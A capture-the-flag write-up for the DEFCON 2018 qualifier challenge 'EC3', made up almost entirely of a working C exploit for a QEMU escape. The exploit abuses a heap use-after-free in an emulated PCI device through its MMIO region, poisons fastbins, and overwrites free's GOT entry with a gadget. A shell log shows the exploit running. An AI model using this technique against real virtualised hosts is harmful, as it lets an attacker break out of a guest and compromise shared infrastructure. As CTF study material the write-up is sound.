DEFCON CTF 2018 QUAL - EC3

Category : pwnable

Summary : qemu escape

Exploit

#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <sys/user.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <stdint.h>


#define OOO_ALLOCATE  0x000000
#define OOO_FREE      0x100000
#define OOO_WRITE     0x200000

#define MAP_SIZE      0x1000000

#define OOO_BIN_BASE   0x1317940
#define FREE_GOT       0x11301a0
#define OOO_MAGIC_GADGET   0x6e65f9

int fd;
char *mmio;

uint64_t ooo_read(uint32_t idx, uint32_t offset){
   uint32_t hwaddr;
   uint64_t out;

   hwaddr = idx << 16 | offset;
   out = *((uint64_t *)(&mmio[hwaddr]));

   return out;
}

void ooo_write(uint32_t idx, uint32_t offset, uint32_t type, uint64_t data, uint32_t length){
   uint32_t hwaddr;
   hwaddr = idx << 16 | type | offset;

   switch(length){
      case 1:
         *((uint8_t *)(&mmio[hwaddr])) = (uint8_t)data;
         break;
      case 2:
         *((uint16_t *)(&mmio[hwaddr])) = (uint16_t)data;
         break;
      case 4:
         *((uint32_t *)(&mmio[hwaddr])) = (uint32_t)data;
         break;
      case 8:
      default:
         *((uint64_t *)(&mmio[hwaddr])) = (uint64_t)data;
   }
}

int main()
{
   uint64_t libc_base = 0, data = 0;

   fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR|O_SYNC);
   mmio = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

   if(fd < 0 || (int64_t)mmio < 0){
      write(1, "fail\n", 5);
      exit(-1);
   }

   ooo_write(2, 0, OOO_ALLOCATE, 0x90/8, 4);
   ooo_write(0, 0, OOO_ALLOCATE, 0x60/8, 4);
   ooo_write(0, 0, OOO_FREE, 0, 4);
   ooo_write(0, 0, OOO_WRITE, OOO_BIN_BASE + (2 * 8) + 0x5 - 8, 8);

/*
(0x70)     fastbin[5]: 0x7fc0b81e69c0 --> 0x7fc0b81e6900 --> 0x7fc0b81e6840 -->
         0x7fc0b8202100 --> 0x7fc0b8202040 --> 0x7fc0b8201f80 --> 0x7fc0b8201ec0 -->
         0x7fc0b8201e00 --> 0x7fc0b8201d40 --> 0x7fc0b8201c80 --> 0x7fc0b8201bc0 -->
         0x7fc0b8201b00 --> 0x7fc0b8201a40 --> 0x7fc0b81e3700 --> 0x7fc0b81e3640 -->
         0x7fc0b81e3580 --> 0x7fc0b81e34c0 --> 0x7fc0b81e3400 --> 0x7fc0b81e3340 -->
         0x7fc0b81e3280 --> 0x7fc0b81e31c0 --> 0x7fc0b81e3100 --> 0x7fc0b81e3040 -->
         0x7fc0b81e2300 --> 0x7fc0b81e2240 --> 0x7fc0b81e2180 --> 0x7fc0b81e20c0 -->
         0x7fc0b81e2000 --> 0x7fc0b81e1f40 --> 0x7fc0b81e1e80 --> 0x7fc0b81e1dc0 -->
         0x131794d (size error (0x78)) --> 0x0
*/
   do{
      ooo_write(0, 0, OOO_ALLOCATE, 0x60/8, 4);     // return value = OOO_BIN_BASE + (2 * 8) + 5 + 8
      data = ooo_read(0, 0);
   }while(data);

   ooo_write(0, 3, OOO_WRITE, FREE_GOT, 8);

   ooo_write(4, 0, OOO_WRITE, OOO_MAGIC_GADGET, 8);
   ooo_write(4, 0, OOO_FREE, 0, 4);
}

/root # cat file | base64 -d > pay
/root # chmod +x pay
/root # mv pay exploit
/root # ./exploit 
CTF{THISISFLAG}
0
qemu: qemu_mutex_lock_impl: Invalid argument
Aborted (core dumped)